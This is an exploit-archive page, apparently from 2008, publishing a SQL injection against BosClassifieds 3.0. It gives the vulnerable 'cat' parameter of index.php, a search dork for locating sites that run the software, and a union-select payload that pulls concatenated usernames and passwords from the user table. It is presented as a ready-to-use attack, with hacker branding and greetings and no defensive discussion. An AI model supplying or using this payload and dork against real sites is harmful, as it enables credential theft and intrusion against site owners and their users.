BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability
# Published : 2008-04-14
# Author : SoSo H H
# Previous Title : SmallBiz eShop (content_id) Remote SQL Injection Vulnerability
# Next Title : BosNews 4.0 (article) Remote SQL Injection Vulnerability

##############################################################################
##                                  !R4Q!4N H4CK3R
##
##  BosClassifieds 3.0 Remote Sql injection Exploit
##
##  By:SoSo H H(Iraqi-Cracker)
##
##  Script website:http://www.bosdev.com
##
##  Dork:"Powered by BosClassifieds Classified Ads System"
##
##############################################################################
## Affected Versoions:
## 
## BosClassifieds 3.0 ( Other Versions Maybe Affected, Not Sure  :)  )
##
##############################################################################
##
## Expl0it:
##
## site.c0m/bosclassifieds/index.php?cat=[SQL]
##
## Example:
##
## SQL:-666 union select 1,2,concat(username,password)from bosdevUUS/*
##
##############################################################################
## Greetz:My Sweet :X,El Mariachi,L!0N,-=Mizo=-,Shadow Administrator
##       Mini-Spider,and all My Friends.
##
##############################################################################

# www.Syue.com [2008-04-14]